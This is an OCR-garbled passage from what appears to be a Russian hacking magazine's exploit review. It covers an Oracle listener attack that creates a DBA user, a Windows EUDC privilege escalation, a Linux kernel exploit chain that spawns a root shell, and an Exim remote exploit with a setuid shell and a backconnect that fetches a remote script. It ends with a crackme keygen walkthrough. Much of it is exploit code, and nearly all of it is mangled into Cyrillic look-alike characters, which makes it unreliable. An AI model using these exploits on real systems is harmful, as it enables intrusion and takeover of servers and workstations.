это С:\огасІе\ога92\здІрІиз\асІппіп\дІодіп.5дІ. Этот файл и к за пускается 
при старте 50Е*Р1из. Аследующими командами мы создаем пользовате- 
ля и даем ему роль ОБА: 

. /кпзстсі.рі — Ъ. 192.168.0.100 --гаѵѵстсі " ( СОШГЕСТ_БАТА= ( ( 

сгеаке изег Ьаскег ісіепкікіесі Ьу каскег; 

дгапк сІЪа ко каскег; 



То есть, понятно, что дырка не простая, и можно придумать что-то 
хитрое и рабочее. На ]атппесі.сопп/~]ѵѵа/Ьаск5/5есигіІѵЛп5стб/ 
ІпзстсІ-сІос.ЫппІ есть более подробное описание уязвимостей ТЫ 5 
Іізіепег'а. □с 
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ПОВЫШЕНИЕ 
ПРИВИЛЕГИИ 
В МІСР050РТ ѴУ/ІЫРОѴУ/5 



ТАК6ЕТ5 



ѴѴіпсІоѵѵзХР. 2003, Ѵізіа, 2008, 7 



Интересная уязвимость была опубликована 24 ноября на ресурсе 
ТЬе Собе Рго]'есі под видом статьи. Буквально через несколько часов 
статья была удалена, но информация уже распространялась по сети с 
огромной скоростью. 

Уязвимость представляет собой классическое переполнение буфера, 
однако есть несколько интересных нюансов. 

Для эксплуатации бага надо выполнить ѴѴіпАРІ-функцию 
ЕпаЫеЕІЮС, что приведет к выполнению системного вызова 
МЮбіЕпаЫеЕІЮС. ЫЮбіЕпаЫеЕІЮС служит для включения или 
выключения шрифтов интерфейса, определенных пользователем, 
и работает следующим образом: функция считывает путь к файлу 
пользовательского шрифта из параметра ЗузІеплБеІюииЕІЮСБопІ:, 
ключа реестра НКЕУ_СШКЕНТ_иЗЕК\ЕШС\<Сиггепб_собе_ 
раде>. 

Для получения значения из реестра используется функция 
РШЗиегуРедізІтуѴаІиез: 



БТЗТАТБЗ КбІОиегуКедізбгуѴаІиез ( 

іп ББСЖС КеІабіѵеТо , 

іп РШЗТК РабЬ, 

іпоиб РКТЬ_дЦЕКУ_КЕСІЗТКУ_ТАВЬЕ «ЭиегуТаЫе, 

іп_орб РѴОІБ Сопбехб , 

іп_орб РѴОІБ Епѵігошпепб 

) ; 



В качестве одного из входных параметров функция получаетуказа- 
тель на структуру РТІ__С!ІІЕРУ_РЕѲІВТРУ_ТАВІ_Е: 

буребеб збгисб _КТБ_0БЕКУ_КЕСІ8ТКУ_ТАВБЕ { 
РКТЕ_0БЕКУ_КЕСІ8ТКУ_КОБТШЕ ОиегуКоибіпе; // указатель 
на функцию, которая осуществляет копирование 
ІЛіОКЮ Еіадз; //то, как будет осуществлено копирование 
РМЗТК Баше ; 

РѴОІБ ЕпбгуСопбехб ; // буфер, куда будут скопированы 
данные из реестра 
БШШ БебаиІбТуре; 

РѴОІБ БебаиІбБаба; 

БЬОБС БебаиІбЬепдбІі; 

} КТЕ_0БЕКУ_КЕСІЗТКУ_ТАВБЕ, 

* рктб_обеку_кесі зтку_тавье ,* 



Атеперь посмотрим, с какими параметрами вызывается данная функ- 
ция в кодеѵѵіп32к.5у5: 

Іеа еах, [еЬр+ѵаг_424 ] 
ризЬ езі ; Епѵігошпепб 

шоѵ [еЪр+БезбіпабіопЗбгіпд.Виббег] , еах 

Іеа еах, [еЪр+БезбіпабіопЗбгіпд] ; еах указывает на 

ІЖІСОБЕ-строку , находящуюся на стеке 

шоѵ ?ЗЬагебС>иегуТаЫе@@3 

РАБ_ВТЕ_0БЕКУ_КЕОІЗТКУ_ТАВЕЕ@@А . ЕпбгуСопбехб , еах 
ризЬ езі ; Сопбехб 
Іеа еах, [еЪр+ЗоигсеЗбгіпд] 
ризЬ. оббзеб ?31іагеб0иегуТаЫе@@3 

РАБ_ВТЕ_0БЕКУ_КЕСІЗТКУ_ТАВЕЕ@@А ; ОиегуТаЫе 
ризЬ. еах ; РабЬ. 
ризЬ езі ; КеіабіѵеТо 

шоѵ [еЪр+БезбіпабіопЗбгіпд . БепдбЬ] , зі 
шоѵ [ еЪр+БезбіпабіопЗбгіпд. МахішишЕепдбЬ] , 208Ь 
; длина ІЖІСОБЕ -строки 
шоѵ ?ЗЬагебС>иегуТаЪ1е@@3 

Р АБ_ВТ Б_ОБЕ КУ _КЕ С 1 3 ТКУ _Т АВ Ь Е @ @ А . ОиегуВоибіпе , езі 
;_КТБ_0БЕКУ_КЕСІЗТКУ_ТАВЬЕ * ЗЬагебОиегуТаЫе 
шоѵ ?8ЬагебС>иегуТаЪ1е@@3 

РАБ_ВТЬ_0БЕКУ_КЕСІЗТКУ_ТАВЕЕ@@А . Еіадз , 24Ь 
; установка Еіадз 
шоѵ ?ЗЬагебС>иегуТаЪ1е@@3 

РАБ_КТЕ_ОБЕВУ_КЕС I ЗТКУ_ТАВЬЕ @ @ А . Баше , 
оббзебаЗузбешсІебаиІбе 

; " ЗузбешБебаиІбЕББСЕопб " 
шоѵ ?8Ьагеб<2иегуТаЪ1е@@3 

РАБ_ВТЕ_0БЕКУ_КЕСІ8ТВУ_ТАВБЕ@@А . БебаиІбТуре , езі 
шоѵ ?8ЬагебС>иегуТаЪ1е@@3 

РАБ_КТБ_0БЕКУ_КЕСІЗТКУ_ТАВЕЕ@@А . БебаиІбБаба , езі 
шоѵ ?8ЬагебС>иегуТаЪ1е@@3 

РАБ_КТБ_0БЕКУ_КЕСІ8ТКУ_ТАВБЕ@@А. БебаиІбБепдбЬ, езі 
шоѵ бѵ\гогс!_А017 9214 , езі 

шоѵ бтлгогс1_А017 9218 , езі 

шоѵ бтлогс1_А017 921С, езі 

саіі бз : ішр Кб1(2иегуВедізбгуѴа1иез@2 О 

; Кбі<2иегуКедізбгуѴа1иез (х,х,х,х,х) 

Следует обратить внимание на значение Еіадз: оно равно 0x24, что 
соответствует РТЕ_аиЕРУ_РЕ0ІЗТРУ_РЕСиіРЕВ I РТІ__СіиЕРУ_ 
РЕ0І5ТРУ_0ІРЕСТ. Взведенный флаг РТІ__СІІІЕРУ_РЕѲІ5ТРУ_ВІРЕСТ 
указываетна то, что при копировании функция ОиегуРоиІіпе будет 
проигнорирована, а данные в ЕпІгуСопІехІ будут обрабатываться как 
нетипизированный буфер. В этом и заключается вся суть уязви мости! 
Ата кующи й может создать кл юч в реестре : к п римеру, Н КЕУ_С II РРЕІ\ІТ_ 
ІІ5ЕР\ЕШС\СР-1251 со значением ЗузІетОеІвиІіЕІЮСБопІ любого типа 
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ОглйЁ МіПІрЙГ 
■> ІмшЕіиНі^і 
*Ѵ рІЧ&КІіст 

АЛуіісфЛ іуЯіт нПігзрі 

9ніЬв 

АеЕійп Сспі-сг 

ѴѴілЛет ІІрЛіІй 



Ѵіеіѵ Ьаяіс іпЬгппаііоп аѣсиі уоуг шгттрийг 

№гм№л «Кеп 

ѴЛп*Ъ*ѵ іІІЛЬіпиЪіН 

СорупдЫ: Е ЗМр МктеннА Сшроглііап. АЛ гідНгК 
МЯПГігі, 




Повышение привилегий на ѴѴіпсІоѵѵз 7 



(до пусти м , П Е0_В I N АРУ) и б ол ьш о й дл и н о й . Д а л е е в сте ко в ы й буфе р будут 
без проверокскопированы данные, что приведеткпереполнению. 

сЬаг 32КеуЫаше [МАХ_РАТН] , [0x800] ; 

зргіпб1_з (згКеуЫате, МАХ_РАТН, "ЕШС\\%й" , СебАСР ( ) ) ; 
КедСгеабеКеу (НКЕУ_СШКЕЫТ_Ц8ЕК, згКеуЫаше, &ЬКеу); 
шетзеб (Ьиііі: , 0x41, 0x800); 

КедЗебѴаІиеЕх (ІіКеу , ЕШС_Е(ЖТ_ѴАЬ , 0, КЕС_ВШАРУ, Ъиіі, 
0x800) ; // сохраняем 0x800 байт, как тип КЕС_ВШАКУ 
КедСІозеКеу (Шеу ) ; 

ЕпаЪІеЕШС (ТРШС) ; // а это приведет к синему экрану 

Примечательнотакже, что проэксплуатировать данную уязвимость 
можно на ѴѴіпбоѵѵз 2000, Ѵізіа, 2008 и 7. На ХР и 2003-й максимум, чего 
можно добиться, это появление синего экрана смерти. 



50ШТЮМ 



Официальное исправление для уязвимости на данный момент от- 
сутствует, однако можно предотвратить возможность ее эксплуатации 
из-под ограниченнойучетной записи, выполнив следующие шаги: 

1. Войти в систему под учетной записью администратора. 

2. Запустить редактор реестра и найти ключ НКЕѴ_ІІ5ЕП5\<5Ю>\ЕІЮС 
(где <5Ю> — идентификатор ограниченной учетной записи). 

3. Отредактировать разрешения ключа, запретив пользовательской 
учетной записи доступ к нему. 

ПОВЫШЕНИЕ ПРИВИЛЕГИЙ 

в ядре ишх 




Выставляем правильные пермишены 




ГАВСЕТ5: 



Ыпих Кегпеі <= 2.6.37 

Очень интересный эксплоит по повышению привилегий, задействую- 
щий сразуЗ различныхуязвимости в ядре, опубликовал Дэн Розен- 



берг. Это отличный примертого, когда неэксплуатирумые на первый 
взгляд уязвимости в связке дают возможность выполнить код. 

1. Первая уязвимость (СѴЕ-201 0-4258), на мой взгляд, самая инте- 
ресная. Она связана с системным вызовом с1опе(2). 

Если пото к создается с помощью с1опе(2) с взведенным флагом 
СІ_0МЕ_СНІІ_0_СІ_ЕАПТЮ, то при завершении потока два нулевых 
байта могут быть за писаны по любому адресу в пользовательском ад- 
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Рііе Ебіі ѴЕеѵѵ ТегтліпаІ Неір 
ІаЬ@иЬітіи:-$ іб 

иісІ=ШѲ0(ІаЬ) ді<І=1О0Ѳ(ІэЬ} дгоир5=4(абт} ,20(біэІоиі) , 24 ( ссігот) 
Ірабтіп) , 119{абтіп] , 122(5атЬа5йаге} , ІСОе(ІаЬ) 

1 аЬ@иЬипіи : ипате -а 

І_іпих иЬипіи 2.6,32-21-депегіс #32 -УЬипИи 5МР Ргі Арг 16 Ѳ8:1Ѳ; 
йми/ипих 

ІаЬ@иЬііпіи;-$ ./СѴЕ201Ѳ-4258 

1* ] КеБОІѵіпд кегпеі аббгеззеБ.*, 

[ + } Кезоіѵеб есопеі іосіі іо 0хеѲ9сі2бС 
[+] кевоіѵеб есопеі ор5 іо ѳхеѳэс^зсс 
[ + ] Кеьоіѵеб соттіі сгебь іо ѲхсѲІббссѲ 
[+] Кезоіѵеб ргераге кегпеі сгеб іо 0хс01беѲѲѲ 



Успех эксплоита 



Сравниваем 
исходники 
патченой 
и непатченой 
версий 




ресном пространстве. Запись двух байтов осуществляется функцией 
риІ_изег(), которая проверяет адрес на принадлежность пользова- 
тельскому АРІ путем стандартной функции ассез5_ок() — аналогом в 
ядре ѴѴіпсІоѵѵз служат РгоЬеЕогРеасІ/РгоЬеЕогѴѴгіІе. 

Нельсон Элхадж (автор данной уязвимости) обнаружил, что если 
ядро выполняет перестановку лимитов адресного пространства 
путем зе1:_'ЫКЕРМІ_Е_ВЗ], и поток вызовет 00Р5 (с помощью какого- 
либо исключения, например, разыменования нулевого указателя), то 
проверка ассезз_ок() не выполнится. 

Это даст возможность переписать два байта по любому адресу уже в 
пространстве ядра, что ведет кдостаточно простому пути повышения 
привилегий. 

Тем не менее, ассезз_ок() имеет нюанс. Чтобы понять его, разберем 
подробнее внутренние функции ядра линукса: деМзО и зеМз(). 
Иногда ядро изменяет правила, для каких адресов ассезз_ок() даст 
разрешение. Этот функционал выполняется функцией зеМзО, кото- 
рая меняет диапазоны для пользовательского и ядерного адресного 
пространства. 

Послетого, какбудетвыполнено зеІ_ЫКЕРМЕІ__05), ассезз_ок() не 
выполнит никаких проверок на принадлежность пользовательскому 
адресному пространству. зеМзІКЕРЫЕЦ^ОЗ) используется в основ- 
ном тогда, когда функция принимаетуказатель на пользовательское 
адресное пространство, а нужно передать указатель на память ядра. 
Типичное использование представлено ниже: 



оШЩбз = деб_:Ез ( ) ; 

зеС_^8 (КЕКМЕЬ_Б8 ) ; // отключение проверок в ассезз_ок() 
ѵ:Ез_геас1ѵ ( бііе , кегпе1_Ьи^^ег , Іеп, &роз) ; // без зеб_ 
бз (КЕШЕЬ_БЗ) ѵбз_геабѵ вызовет исключение , так как 
внутри идет проверка посредством ассезз_ок() 
зек_бз (о1б_бз ) ; // возврат в обычное русло 

2 . Вторая уязвимость (СѴЕ-201 0-3849) — это простейшее разыме- 
нование нулевого указателя в обработке Есопеі-протокола, которая 
ведет л ишь к панике ядра. 

3. Третья уязвимость (СѴЕ-201 0-3850) — неправильная настройка 
прав на сетевые интерфейсы, с помощью которой можно присвоить 
Есопеі-адрес на любой сетевой интерфейс. 

Также следует рассмотреть некоторые аспекты работы ядра Ііпих, 
чтобы стало понятно, кактри уязвимости работают в связке. 
Механизм Кегпеі ООРЭ’ов: Когда в ядре происходит 00Р5 (какое- 
либо исключение) — к примеру, из-за вызова макроса ВІІѲО, который 
используется разработчиками для контроля неудачи аззегі’а, 
ядро пытается очистить ресурсы, а также убить текущий процесс с 
помощью функции бо_ехіі(). В этот моменту процесса тотже контекст, 
что и до выполнения ООРЭ'а, включая зеМзО-перезапись диапа- 
зонов адресных пространств. Из этого следует, что при выполнении 
ассезз_ок() в коде бо_ехіі() никаких проверок выполнено не будет! 
Опция СІ_ОМЕ_СНІІ_0_СІ_ЕАРТЮ в параметре біадз функции сІопеО 
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Удачное выполнение удаленного сплоита 



означает, что при выходе потока ядро за пишет два нулевых байта в зкгпсру (ікг . ікг_пате, "екЪО" , іебамзіе) ; 

специальный адрес в адресном пространстве потока, для того чтобы // стандартный сетевой интерфейс екЬО 

уведомить остальные потоки о завершении текущего. Этот функци- гек = іоскі ( кіісіез [2 ] , зіосзіеаббк, &ікг) ; 

онал реализован одной строчкой и обнуляет адрес в специальной // выставляет Есопек адрес 

структуре Іазк_зІгис1: (которая описывает поток/процесс): зріісе (кіійез [3] , шш, кіЫез[1], ШШ , 128, 0); 

зріісе (кіісіез [0] , ШШ, кіісіез [2], ШШ, 128, 0); 
рик_изег(0, кзк->с!еаг_сМ1с1_кіс1) ; // вызовет Ш11 



Обычно это не вызывает никаких исключений, однако если данный код 
исполняется сусловием деМзО == КЕРЫЕІ__05,то никаких проверок 
не будет выполнено, и мы можем подставить любой адрес ядра. 

Так какже заставить определенный код работать при условии 
деМзП == КЕРЫЕЕ_05? Дэн Розенберг нашел лазейку, используя 
функцию зрІісеО. Системный вызов зрІісеО не так давно появился 
в ядре, он используется для перемещения данных между пайпа- 
ми и файловыми дескрипторами. Создаем Есопеі-сокет и далее 
вызываем зрІісеО с параметром этого сокета, что приведет к вызову 
есопеІ_зепсІ5ппд с зеМз(КЕРМЕЕ_05). 

Теперь разберем эксплойтпо кирпичикам: 

Создание сокетов для использования в зрІісеО 

кіісіез [2 ] = зоскек (РЕ_ЕС(ЖЕТ, ЗОСК_БСКАМ, 0); 
кіісіез [3] = ореп ( " /сіеѵ/гего" , 0_КБОШУ) ; 

Сбор адресов ядерных функций и данных (сгесіепкіаіз или 
прав процесса) 

есопек_іоск1 = дек_кегпе1_зут ( " есопек_іоск1 " ) ; 
есопек_орз = дек_кегпе1_зут ( " есопек_орз " ) ; 
соттік_сгес1з = (_соттік_сгес1з ) 

дек_кегпе1_зут ( " соттік_сгес1з " ) ; 
ргераге_кегпе1_сгесі = (_ргераге_кегпе1_сгес!) 

дек_кегпе1_зут ( "ргераге-кегпе^сгесТ' ) ; 

Создание потока 

сіопе ( (іпк (*) (ѵоісі *) )кгіддег, 

|уоШ *) ( (ипзідпесі іопд) печлзкаск + 6553 6) , 

СБ(ЖЕ_ѴМ | С БОБЕ_С Н I Ь Б_С Ь Е АКТ I Б | ЗІССНББ, 

/* с флагом С Б(ЖЕ_СН I ЬБ_С БЕ АКТ I Б */ 

&кі1сіез, ШШ, ШШ, кагдек) ; 
іоскі ( кіісіез [2 ] , 0, ШШ); 
ехесі ( " /Ып/зЬ" , " /Ып/зк" , ШШ) ; 

// вызов зкеіі с правами рута 

Функция, которая вызовет разыменование нулевого 
указателя в есопек_зепс1шзд 

іпк кгіддег(іпк * кіісіез) 

{ 

іпк гек; 

ікгед ікг; 

шешзек(&ікг, 0, зігеок ( ікг ) ) ; 



роіпкег (Зегекегепсе 

/ * Сюда мы уже не попадем ... * / 
ехік ( 0 ) ; 

} 



юштюы 



Обновляем ядро до последнего Реіеазе Сапбібаіе'а 
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УДАЛЕННОЕ 
ИСПОЛНЕНИЕ 
КОДА В ЕХІМ 



Ехіт 4.63 (РебНаі/СепІоз/ОеЬіап) 

Небезызвестный Кіпдсоре снова порадовал общественность зегѵег- 
зісіе эксплоитом на популярный Ореп Эоигсе продукт — почтовый 
сервер Ехіт. 

Хотя эксплоит работает на достаточно старой версии Ехіт’а, 
релиз которой был популярен еще в далеком 2006 году [ ехіт.огд/ 
Іигкег/теззаде/20060731 .142652. 97е79аЫ .еп.ЫтІ и зесіізіз.огд/ 
МЩізсІозиге/201 0/Рес/233 ]. используемыетехники актуальны и по 
сей день. 

После проведения сШ-анализа файла ехрапб.с становится ясно, что 
это типичный іпІедегоѵегНоѵѵ. 

Важно отметить, что Рауіоаб в эксплойте делает Ьасксоппесі зЬеІІ’а с 
правами гоок 

#іпс1исіе <зксііо.кі> 

кіпсіисіе <ипізксі.іі> 

іпк таіп(іпк агдс , скаг *агдѵ[]) 

{ 

зекиісі ( 0 ) ; 

зекдісі ( 0 ) ; 

зекдгоирз (0, ШБЬ) ; 

ехесі ( " /Ьіп/зЬ" , " зк", ШШ) ; 

} 
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Его выполнение производится на скомпрометированной системе 
путем нехитрого манипулирования с файлами: 

зузЬет ("дсс /ѵаг/зроо1/ехіт4/з . с -о /ѵаг/зроо1/ехіш4/з ; 
гш /ѵаг/зроо1/ехіш4/з . с" ) ; 

ореп ЕІЬЕ, " >/Ьшр/е . сопі" ; 

ргіпЬ РІЬЕ " зроо1_сіігесЬогу - \$ {гип{ /Ьіп/сЬоѵш 
гооЬ:гооЬ /ѵаг/зроо1/ехіт4/з} } \$ {гші{ /Ъіп/сЬтосІ 4755 / 
ѵаг/зроо1/ехіт4/з} } " ; 
сіозе РІЬЕ; 

зузЬеш("ехіт -С/Ьтр/е . сопі -д; гш /Ьтр/е . сопі " ) ; 

зузЬеш( "ипаше -а; " ) ; 

зузЬет ( " /ѵаг/зроо1/ехіш4/з " ) ; 

зузЬет ( $зузЬет) ; 

Забавно, но в эксплоите присутствует что-то наподобие беір’а — 
наверное, чтобы никто не заблудился :). 

іі ( $ # АКСѴ пе 3) 

{ 

ргіпЬ " . /ехішхрі <1юзЬ/ір> <Ьгозапиг1> <уоигір> 
<уоигрогЬ>\п" ; 

ргіпЬ "ехашріе: . /ехішхрі иЬогопЬ о . еЫи 
ЬЬЬр : / /шт. Ъ.4х . пеі/зЬеІІ . ЬхЬ 3.1.33.7 443\п"; 
ехіЬ ; 

} 



безопасности до вызова іпзег1:_ѵпп_5І:гис1:, тем самым атакующий 
может обойти механизм тплар_тіп_асІсІг с помощью лимитирова- 
ния страницдля определенных проецирований. 

$ саЬ /ргос/зуз/ѵт/тшар_шіп_ас!с1г 
65536 < 0x10000 

$ саЬ іпзЬа11_зресіа1_шарріпд . з 
зесЬіоп .Ъзз 

гезЬ В38_312Е 
зесЬіоп .ЬехЬ 
дІоЬаІ _зЬагЬ 
_зЬагЬ : 

шоѵ еах, ЫК__раизе 

іпЬ 0x80 

$ пазт -В Ш3_раизе=29 -ЬВ38_8І2Е=0хіііес1000 -1 еіі -о 

іпзЬа11_зресіа1_тарріпд . о іпзЬа11_зресіа1_шарріпд . з 
$ 1(5 -т е1і_і386 -ТЬехЬ = 0х10000 -ТЬзз=0х11000 -о іпзЬаІІ. 
зресіа1_шарріпд іпзЬа11_зресіа1_шарріпд . о 
$ . /іпзЬа11_зресіа1_шарріпд & 

[1] 14303 

$ саЬ /ргос/14303/шарз 

00001000-00010000 г-хр 00000000 00:00 0 

[ѵсізо] < залезли за предел! 

00010000-00011000 г-хр 00001000 00:19 2453665 
/Ьоше/1аѵізо/іпз1а11_зресіа1_шарріпд 
ОООІІООО-ІШеООО гѵ^хр 00000000 00:00 
[зіаск] 



Перейдем к формированию данных, которые приведут к выполне- 
нию шелл -кода. При манипуляциях с переменной сразу видно, что 
тут пахнет і піедег оѵегбіоѵѵ: 

$шах_шзд = 52428800; 



К сожалению, уязвимость позволяет проецировать память лишь на 
4096 байтза пределами значения тппар_ппіп_асІсІг. Однако стоит 
отметить, что на Ыпих ПесІ На! значение тппар_ппіп_асІсІг по умол- 
чанию выставлено в 4096, соответственно, мы можем проецировать 
память по нулевому указателю! 



$шзд_1еп = $шах_шзд + 1024*256; 



ткЬіІе ( ІепдіЬ. ( $Ьос1у ) < $шзд_1еп) 

{ 

$Ьос1у . = $ѵ; 

} 

$Ьосіу = зиЬзІг ( $Ьосіу , 0, $шзд_1еп) ; 



ргіпЬ $зоск $Ьо(5у; 

Что и приводит к переполнению и эксплуатации збеіісосіе. 



юштюы 



Применить нехитрый патч: 

а/1з/ехес . с 

+++ Ь/1з/ехес . с 

@@ -275,7 +275,14 @@ зЬаЫс іпЬ Ьргт_тш_іпіЬ ( зЬгисЬ 

1іпих_Ъіпргт *Ьргт) 

ѵта->ѵт_11адз = ѴМ_ЗТАСК_ЕЬАСЗ I ѴМ_ЗТАСК_ІЫСОМРЬЕТЕ_ 
ЗЕТЬР; 

ѵша->ѵш_раде_ргоЬ = ѵш_деЬ_раде_ргоЬ (ѵша->ѵш_11адз ) ; 
ІЕІТ_Ы8Т_НЕАБ ( &ѵта->апоп_ѵта_с]таіп) ; 



БОШТІОЫ 



Для решения этой баги в ехіпп 4.64 [ Іізіз.ехіт.ога/іигкег/теззад 
е/20061 220.1 05401 .340(1 с ІЗ.еп.ЫтІ ] был добавлен индикатор на 
іпіедегоѵегі'іоѵѵ. 



04 



ОБХОД ОГРАНИЧЕНИИ 
БЕЗОПАСНОСТИ 

в ядре ишх 



ГАРОЕТ5: 



Ыпих кегпеі 

И снова легендарный Та вис Орман ди обнаружил замечательную 
уязвимость — обход защиты выделения памяти ниже значения, 
установленного в ттар_тіп_асІсІг. С помощью этого становится 
реальностью эксплуатация уязвимостей класса «Разыменование 
нулевого указателя». Дело в том, что функция і пзіа 11_зресіа 1_ 
ппарріпд (используемая для установки ѵсізо) не выполняет проверки 



+ егг = зесигіЬу_1і1е_шшар (№ІЬЬ , 0, 0, 0, ѵша->ѵш_ 
зЬагЬ , 1 ) ; 

+ 

+ іі (егг) 

+ доЬо егг; 

+ 

егг = іпзегЬ_ѵш_зЬгисЬ (шш, ѵша) ; 

+ 

а/шш/шшар . с 

+ + + Ь/шш/шшар.с 

@@ -2479,6 +2479,11 @@ іпЬ іпзЬа11_зресіа1_ 
шарріпд ( зЬгисЬ шш_зЬгисЬ *шш, 

ѵша->ѵш_орз = &зресіа1_шарріпд_ѵшорз; 
ѵша->ѵш_ргіѵаЬе_(іаЬа = радез; 

+ іі ( зесигііу_Іі1е_шшар (ШЬЬ , 0, 0, 0, ѵша->ѵш_зЬагЬ , 
1 )) { 

+ кшеш_сасЬе_Ігее (ѵш_агеа_сасЬер , ѵша) ; 

+ геіигп -ЕРЕКМ; 



► 040 
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Взлом нестандартной защиты на серийном ключе 

• Абсолютное большинство защит на серийных ключах построено 
по одному и тому же принципу. Их даже ломать становится неинтересно. 
Но вот сгаскше ѴУНаІНТМІ., написанный программистом с ником 
СНіѵѵака, представляет собой пример хорошей защиты на серийном 
ключе. Именно ее мы сегодня и разберем. 



Для регистрации программ, защищенных с помощью серийных 
ключей, пользователю предлагается ввести уникальное имя и 
серийный номер (они, как правило, поставляются в закрытом 
конверте вместе с лицензионной копией программы). Программа 
как-то проверяет их и выдает свой вердикт: данная копия либо 
зарегистрирована, либо нет. 

В абсолютном большинстве случаев алгоритм проверки следую- 
щий: на основе введенного имени пользователя генерируется 
последовательность символов, которая сверяется с введенным 
серийным номером. Если они совпадают, то пользователь при- 
знается легальным правообладателем, если же они различны, то 
этому же пользователю в вежливой форме предлагается погулять. 
Взлом таких защит сводится к простому «выдиранию» алгоритма 
генерирования серийного номера на основе имени пользователя. 
Причем мне встречались такие сгаскте'сы, в которых для напи- 
сания кеудеп'а не требовалось даже разбираться в этом самом 
алгоритме: все решалось тупым копированием процедур, ответ- 



ственных за генерацию валидного серийного номера. Понятно, 
что это достаточно скучное дело, даже не требующее серьезного 
напряжения извилин. 

Что мы будем ломать 

Сгаскте ѴѴЬаШТМІ- — это тоже пример защиты на регистраци- 
онном ключе. Но построенный по совершенно иному принципу. 
Написан он программистом, известным под ником Сбіѵѵака. 
Скачать сам сгаскте можно бесплатно по ссылке сгаскіаб.ги/ 
сгаскте/ѵѵЬаіЫтІ.гір . Именно это я и предлагаю тебе сделать, 
закрыв эту статью. Ведь ломать самому всегда намного инте- 
реснее, чем читать инструкции по взлому. Главное окно про- 
граммы представлено на одноименном рисунке. Значение в поле 
«МасЫпесобе» у тебя будет другим. Откуда оно берется, узнаем 
позже. Как нетрудно догадаться, нужно найти валидные комбина- 
ции значений полей «Ыате» и «Зегіаі», а также по возможности 
написать кеудеп. 



► 042 
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Епіег Мате апсі ЗегіаІ (о гедізіег. 




Главное окно программы 



Ну что ж, со знакомством, думаю, закончили. Теперь переходим к 
самому интересному. 



Первый взгляд 

Итак, приступим. Начинается программа с получения адреса 
функции ЗЬоуѵНТМЮіаІод из библиотеки тзЫтЫН (делается это 
с помощью стандартных функций 1_оасИ_іЬгагуА и ОеіРгосАсІсІгезз). 
После этого вызывается несколько процедур, которые и выполня- 
ют основную работу. Ниже приводится дизассемблерный листинг 
этой части программы, полученный с помощью ЮА Рго,а также 
мои комментарии к нему: 



. бехб : 00401043 
. бехк : 00401048 
. Дехб : 0040104Б 



с а II 
саіі 
саіі 



зиЪ_4010В2 
зиЪ_4012 98 
зиЪ_401169 



Если пользователь просто закрыл окно, то выходим 
из программы, иначе вызываем процедуру зиЬ_401298 



. СехД : 00401052 
. СехД : 00401059 
. ВехД :0040105В 



стр 

ЗП2 

саіі 



; Завершаем работу приложения 
. СехВ : 00401060 рор 

. ВехВ : 00401067 абб 

. Вехб : 0040106А ризк 

. Вехб : 0040106С саіі 

. Вехб : 0040106С збагб епбр 



бѵ\гогб_403 03В , 0 

зкогЦ 1ос_401060 
зиЬ_4012 98 

Іагде бмогб рбг 1з:0 
езр , 4 

0 ; иЕхібСобе 
ЕхібРгосезз 



Из листинга видно, что программа последовательно вызы- 
вает три процедуры (зиб_40 1 0В2, зиЬ_401298, зи Ь_40 1 1 69) ; в 
том случае, если пользователь нажал на кнопку «Редізіег», то 



еще раз вызывается процедура зи Ь_40 1 060. Что ж, пока вроде 
ничего сложного. Теперь познакомимся с нашими процедурами 
поближе. 

Таинственное поле МасЫпесосІе 

Первой на очереди стоит процедура зиЬ_4010В2. В этой про- 
цедуре вызывается функция ѲеіЗузІетІЫо, и на основе возвра- 
щенных ей данных по определенному алгоритму формируется 
значение, которое и идет в поле «МасЫпесосІе». 

Не ассемблером единым 

Процедура зи Ь_40 1 298 ответственна за формирование и ото- 
бражение окна на экране. В ней происходит вызов найденной 
ранее функции 5Ьо\л/НТМІ_0іаІод. В качестве параметра она 
принимает строку с Ыті-кодом окна. В целях экономии места 
демонстрировать весь Ыті-код окна я не буду, приведу лишь 
код обработчика нажатия на кнопку «Редізіег», написанный на 
баѵаЗсгі рі. Вот он: 

Іипсбіоп окВиббопСІіск ( ) 

{ 

ѵаг х = 0; 

ѵаг у = 0; 

ѵаг 2 = 0 ; 

ѵаг скагх = 0 ; 

ѵаг скагу = 0 ; 

ѵаг туЫаше = Ыате.ѵаіие; 

ѵаг туЗегіаІ = ЗегіаІ .ѵаіие; 

ѵаг туКапбот = Капбот. ѵаіие; 

іог (ѵаг і=0; істуЫате . Іепдкк; і++) 
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взлом 




Проверка пройдена 



{ 

х = х + туЫаше . сйагСобеАб ( і ) ; 

} 

Іог (ѵаг і=0; і <туЗегіа1 . ІепдбЬ; і++) 

{ 

сйагх = туЗегіаІ . сйагСобеАб ( і-1 ) ; 

сйагу = шуЗегіаІ . сйагСобеАб ( і ) ; 

іі. (сЬагх != сйагу) 

{ 

2 = 2 + сЬагу ; 
сііагх = сЬагу; 

} 

} 

Іог (ѵаг і = 0 ; і <аггАгдз . ІепдЫі; і++) 

{ 

у = у + аггАгдз . сЬагСобеАб (і) ; 

} 

міпбоіл . гебигпѴаІие =х . боЗбгіпд ( 10 ) + "?" 

+ 2 . боЗбгіпд (16) + "?" + у . боЗбгіпд ( 10 ) ; 

чліпбочл. сіозе ( ) ; } 

Если ты знаком с языком ^ѵаБсгірІ, то легко увидишь, что здесь 
происходит суммирование кодов символов, составляющих имя, 
серийный номер и код машины (поле «МасЫпесосІе»]. Причем 
очередной символ серийного номера добавляется только в том 
случае, если он отличается от предыдущего символа серийного 
номера. Полученные значения оформляются в строку, символом- 
разделителем служит знак «?». Эта строка возвращается прило- 
жению, создавшему окно. 



Защита 

Следом за вызовом процедуры зи Ь_40 1298, создающей окно, 
идет вызов процедуры зи Ь_40 1169, которая представляет для нас 
особый интерес, поскольку именно в ней сосредоточен защитный 
механизм. 

Данная процедура осуществляет разбор полученной на прошлом 
этапе строки и формирует три числа на основе имени пользова- 
теля, серийного номера и информации о машине. Числа форми- 
руются по следующему принципу: если у нас в качестве строко- 
вого выражения было передано «725», то после преобразований 
будет получено значение 7256. 

Полученные таким нехитрым образом числа складываются друг 
с другом, образуя ключ, которым расшифровывается внутрен- 
ний буфер. Дизассемблерный код расшифровщика приводится 
ниже: 

; Цикл расшифровки буфера . Алгоритм расшифровки — 

; банальный хог. Ключ расшифровки лежит в регистре сх 



бехб : 00401225 
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Так программа говорит о неверном серийнике 



; Проверка правильности расшифровки, осуществленная 
; путем сравнения трех символов из расшифрованного 
; буфера с эталонными символами. Если хотя бы 
; один символ не совпадает с образцом, нас посылают 
; куда подальше. 



. ЕехЕ : 00401240 


Іеа 


еах. 


ипк_ 


403072 


. ЕехЕ : 00401246 


стр 


ЬуЕе 


рЕг 


[еах] , 28Ц 


. ЕехЕ : 00401249 


] П2 


